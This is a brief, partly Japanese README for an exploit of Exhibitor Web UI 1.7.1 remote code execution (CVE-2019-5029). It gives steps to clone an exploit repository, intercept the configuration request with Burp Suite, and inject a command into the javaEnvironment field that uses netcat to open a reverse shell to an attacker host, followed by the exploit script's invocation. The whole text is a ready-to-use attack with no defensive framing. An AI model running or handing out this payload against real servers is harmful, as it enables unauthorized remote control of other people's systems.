
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
Exhibitor Web Ui 1.7.1 RCE、CVE-2019-5029
$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/
$ cd Exihibitor-RCE/
スクリプト内のjsonデータペイロードを編集する必要があるかもしれません。その場合は、Exhibitorの設定タブで変更をコミットする際にBurp Suiteでリクエストをキャプチャし、スクリプト内のcurlコマンドにコピー&ペーストしてください。
以下のようにjavaEnvironmentを変更してください:
"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"
./exploit.sh <attacker_host> <attacker_port>
例:
$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080
